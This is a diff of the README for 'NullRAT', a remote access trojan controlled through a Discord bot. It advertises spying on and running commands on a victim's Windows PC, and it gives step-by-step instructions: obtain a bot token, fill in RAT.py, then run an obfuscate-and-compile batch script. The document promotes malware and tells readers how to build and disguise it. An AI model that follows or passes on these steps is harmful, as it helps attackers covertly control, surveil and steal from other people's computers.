NullCode1337/NullRAT/README.md

 - Get some information about their PC
 - Execute command prompt commands (Thank you Sp00p)
-- Browse around their PC, see directory contents, and much more `It's windows-only by the way; sorry :(`
+- Browse around their PC, see directory contents, and much more

+`It's windows-only by the way; sorry :(`

 ## How to use:
-- Python should be installed on the PC
+- Python 3.6+ should be installed on the PC and added to path (pip folder should be added too)
 - Don't compile normally using pyinstaller, use the compiler provided
 1) [Create a Discord bot and obtain it's token](https://www.freecodecamp.org/news/create-a-discord-bot-with-python/)
 2) Download this repository as zip [unstable] / Dowload the release [stable]
 3) Execute "Install Dependencies.bat"
 4) Fill up the empty variables & bot token in RAT.py
-5) Execute "Obfuscate and compile.bat"
+5) Execute "RATCompiler.bat"
 6) That should be everything

 ## Credits
 - Monst3red for inspiration
 - Sp00p64 for some commands from [his RAT](https://github.com/Sp00p64/DiscordRAT)
 - Buntii for ideas
-- NullCode